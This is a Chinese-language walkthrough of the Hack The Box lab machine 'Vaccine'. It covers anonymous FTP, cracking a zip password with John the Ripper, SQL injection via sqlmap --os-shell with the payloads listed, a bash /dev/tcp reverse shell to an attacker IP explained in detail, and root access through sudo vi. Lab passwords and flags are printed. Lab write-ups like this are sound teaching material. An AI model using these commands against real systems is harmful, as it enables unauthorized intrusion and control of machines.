Task 1
Q:Besides SSH and HTTP, what other service is hosted on this box?
nmap直接扫描
┌──(root💀kali)-[~/桌面]
└─# nmap -sV -Pn 10.129.75.167
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 10:01 CST
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Nmap scan report for 10.129.75.167
Host is up (0.70s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 106.77 seconds其中的RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
是因为我的网络不好而产生的报错,超时平均方差比较大。
参考资料:
A:ftp
Task 2
Q:This service can be configured to allow login with any password for specific username. What is that username?
A:anonymous
Task 3
Q:What is the name of the file downloaded over this service?
连接到FTP上
┌──(root💀kali)-[~/桌面]
└─# ftp 10.129.75.167
Connected to 10.129.75.167.
220 (vsFTPd 3.0.3)
Name (10.129.75.167:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxr-xr-x 1 0 0 2533 Apr 13 2021 backup.zip
226 Directory send OK.
ftp> get backup.zip
local: backup.zip remote: backup.zip
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for backup.zip (2533 bytes).
226 Transfer complete.
2533 bytes received in 0.27 secs (9.2379 kB/s)可以看到里面有个backup.zip文件
A:backup.zip
Task 4
Q:What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts?
john the rapper
是一个用于破解各种密码的软件。
首先需要使用zip2john生成hash
然后进行破解
┌──(root💀kali)-[~/桌面]
└─# zip2john backup.zip > hash
ver 2.0 efh 5455 efh 7875 backup.zip/index.php PKZIP Encr: TS_chk, cmplen=1201, decmplen=2594, crc=3A41AE06 ts=5722 cs=5722 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/style.css PKZIP Encr: TS_chk, cmplen=986, decmplen=3274, crc=1B1CCD6A ts=989A cs=989a type=8
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
┌──(root💀kali)-[~/桌面]
└─# john hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
741852963 (backup.zip)
1g 0:00:00:00 DONE 2/3 (2022-05-08 10:12) 6.250g/s 531356p/s 531356c/s 531356C/s 123456..faithfaith
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 密码:741852963
A:741852963
Task 5
Q:What is the password for the admin user on the website?
解压压缩包
┌──(root💀kali)-[~/桌面]
└─# unzip backup.zip
Archive: backup.zip
[backup.zip] index.php password:
inflating: index.php
inflating: style.css 查看index.php
能够看到密码的哈希值2cb42f8734ea607eefed3b70af13bbd3
<!DOCTYPE html>
<?php
session_start();
if(isset($_POST['username']) && isset($_POST['password'])) {
if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
$_SESSION['login'] = "true";
header("Location: dashboard.php");
}
}
?>
在线搜索md5
得到结果:qwerty789
A:qwerty789
Task 6
Q:What option can be passed to sqlmap to try to get command execution via the sql injection?
用上面的账号密码登录进去发现是一个查询,手动检测发现有注入
http://10.129.75.167/dashboard.php?search=%27AND%201=1%20--
http://10.129.75.167/dashboard.php?search=%27AND%202=1%20--直接用sqlmap跑咯
由于是管理员权限。那么跑的时候一定要添加cookie信息
我的是:PHPSESSID=462ehhjmskjo99v8ld1m3d470b
获得shell:
┌──(root💀kali)-[~/桌面]
└─# sqlmap -u 10.129.75.167/dashboard.php?search=1 --cookie=PHPSESSID=462ehhjmskjo99v8ld1m3d470b --risk=3 --level=3 --random-agent --os-shell
___
__H__
___ ___[.]_____ ___ ___ {1.5.11#stable}
|_ -| . ["] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:40:20 /2022-05-08/
[10:40:20] [INFO] fetched random HTTP User-Agent header value 'Opera/9.80 (Windows NT 6.0; U; de) Presto/2.2.15 Version/10.00' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[10:40:20] [INFO] testing connection to the target URL
[10:40:21] [INFO] checking if the target is protected by some kind of WAF/IPS
[10:40:22] [INFO] testing if the target URL content is stable
[10:40:23] [INFO] target URL content is stable
[10:40:23] [INFO] testing if GET parameter 'search' is dynamic
[10:40:24] [WARNING] GET parameter 'search' does not appear to be dynamic
[10:40:25] [INFO] heuristic (basic) test shows that GET parameter 'search' might be injectable (possible DBMS: 'PostgreSQL')
[10:40:26] [INFO] heuristic (XSS) test shows that GET parameter 'search' might be vulnerable to cross-site scripting (XSS) attacks
[10:40:26] [INFO] testing for SQL injection on GET parameter 'search'
it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'PostgreSQL' extending provided level (3) value? [Y/n] n
[10:40:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:41:21] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[10:41:38] [INFO] GET parameter 'search' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable (with --string="SUV")
[10:41:38] [INFO] testing 'Generic inline queries'
[10:41:39] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[10:41:40] [INFO] GET parameter 'search' is 'PostgreSQL AND error-based - WHERE or HAVING clause' injectable
[10:41:40] [INFO] testing 'PostgreSQL inline queries'
[10:41:41] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[10:41:53] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable
[10:41:53] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[10:42:05] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 AND time-based blind' injectable
[10:42:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[10:42:05] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[10:42:06] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[10:42:07] [WARNING] reflective value(s) found and filtering out
[10:42:12] [INFO] target URL appears to have 5 columns in query
[10:42:15] [INFO] GET parameter 'search' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
[10:42:15] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 82 HTTP(s) requests:
---
Parameter: search (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: search=-7712' OR 5759=5759-- iRnE
Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: search=1' AND 8843=CAST((CHR(113)||CHR(98)||CHR(118)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (8843=8843) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(120)||CHR(113)||CHR(112)||CHR(113)) AS NUMERIC)-- XdGz
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: search=1';SELECT PG_SLEEP(5)--
Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: search=1' AND 1588=(SELECT 1588 FROM PG_SLEEP(5))-- kJxc
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,NULL,(CHR(113)||CHR(98)||CHR(118)||CHR(107)||CHR(113))||(CHR(102)||CHR(75)||CHR(100)||CHR(90)||CHR(89)||CHR(117)||CHR(66)||CHR(81)||CHR(97)||CHR(84)||CHR(101)||CHR(102)||CHR(110)||CHR(108)||CHR(122)||CHR(81)||CHR(102)||CHR(108)||CHR(106)||CHR(108)||CHR(65)||CHR(86)||CHR(77)||CHR(86)||CHR(71)||CHR(72)||CHR(105)||CHR(72)||CHR(99)||CHR(100)||CHR(101)||CHR(107)||CHR(88)||CHR(79)||CHR(114)||CHR(66)||CHR(81)||CHR(75)||CHR(74)||CHR(114))||(CHR(113)||CHR(120)||CHR(113)||CHR(112)||CHR(113))-- GBDO
---
[10:42:58] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 19.10 or 20.04 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: PostgreSQL
[10:43:07] [INFO] fingerprinting the back-end DBMS operating system
[10:43:11] [INFO] the back-end DBMS operating system is Linux
[10:43:13] [INFO] testing if current user is DBA
[10:43:17] [INFO] going to use 'COPY ... FROM PROGRAM ...' command execution
[10:43:17] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> A:--os-shell
Task 7
Q:What program can the postgres user run as root using sudo?
root flag有过程
A:vi
Flag
在前面拿到了os-shell之后我们开启nc监听
┌──(root💀kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...os-shell反弹链接
os-shell> bash -c "bash -i >& /dev/tcp/10.10.16.86/4444 0>&1"
bash -c 代表用bash来执行一段命令,参数c后面加上一段需要执行的命令
bash -i 代表建立一个交互式的shell
这个我们经常见到,例如我们常用 echo “hello world”>hello.txt,这个代表将将字符串写入一个文件
那么&>又代表什么呢?我们先来了解一下shell中的三个文件描述符(file descriptor)。
- 0 是一个文件描述符,表示标准输入(stdin),即在shell中我们输入的字符。
- 1 是一个文件描述符,表示标准输出(stdout),即在shell中系统输出的字符。
- 2是一个文件描述符,表示标准错误(stderr),即shell中报错输出的字符。
在>前面的&代表文件描述符1和2,也就是标准输出和标准错误信息,这里是把交互式bash中的标准输出信息和报错信息都写入/dev/tcp/10.10.16.86/4444
文件中。
这里的/dev/tcp
是一个设备文件,并不是一个真正的文本文件。它的作用是建立tcp连接,在这里是与10.10.16.86的4444端口建立连接。
0>&1 这代表bash中的标准输入信息写入文件管道1(stdout),这里的&的意思与前面的不同,这里&与1是一个整体,&1代表文件描述符1(stdout)。而前面已经通过命令&>将文件管道1(stdout)的数据写入了/dev/tcp,所以这里的文件管道0的数据也会跟随文件管道1写入/dev/tcp。这样就将bash -i中的全部数据传输到了本地监听程序中,也就建立一个shell。
nc就上线了
user flag
postgres@vaccine:/var/lib/postgresql/11/main$ cd ~
cd ~
postgres@vaccine:/var/lib/postgresql$ ls
ls
11
user.txt
postgres@vaccine:/var/lib/postgresql$ cat user.txt
cat user.txt
ec9b13ca4d6229cd5cc1e09980965bf7FLAG:`ec9b13ca4d6229cd5cc1e09980965bf7
# root flag
去网站根目录翻一翻
postgres@vaccine:/var/lib/postgresql/11/main$ cd /var/www/html
cd /var/www/html
postgres@vaccine:/var/www/html$ ls
ls
bg.png
dashboard.css
dashboard.js
dashboard.php
index.php
license.txt
style.css
postgres@vaccine:/var/www/html$ cat dashboard.php
cat dashboard.php
得到数据库账号密码
<?php
session_start();
if($_SESSION['login'] !== "true") {
header("Location: index.php");
die();
}
try {
$conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");
}尝试下ssh登录看看,不一定登的上去
┌──(root💀kali)-[~/桌面]
└─# ssh postgres@10.129.75.167
The authenticity of host '10.129.75.167 (10.129.75.167)' can't be established.
ED25519 key fingerprint is SHA256:4qLpMBLGtEbuHObR8YU15AGlIlpd0dsdiGh/pkeZYFo.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.75.167' (ED25519) to the list of known hosts.
postgres@10.129.75.167's password:
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-64-generic x86_64)
进去了,那我们想办法提升管理员权限咯
查看一下能使用的高级权限命令
postgres@vaccine:~$ sudo -l
Matching Defaults entries for postgres on vaccine:
env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET",
env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH",
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
mail_badpass
User postgres may run the following commands on vaccine:
(ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf可以看到能以root身份使用vi打开`/etc/postgresql/11/main/pg_hba.conf`
这个文件
而且vi可以直接执行命令的,那么我们用vi打开这个文件,然后用命令提权咯
postgres@vaccine:~$ sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
//vi中命令:!/bin/bash
root@vaccine:/var/lib/postgresql#
然后我们去找flag啦
root@vaccine:/var/lib/postgresql# cd ~
root@vaccine:~# ls
pg_hba.conf root.txt snap
root@vaccine:~# cat root.txt
dd6e058e814260bc70e9bbdef2715849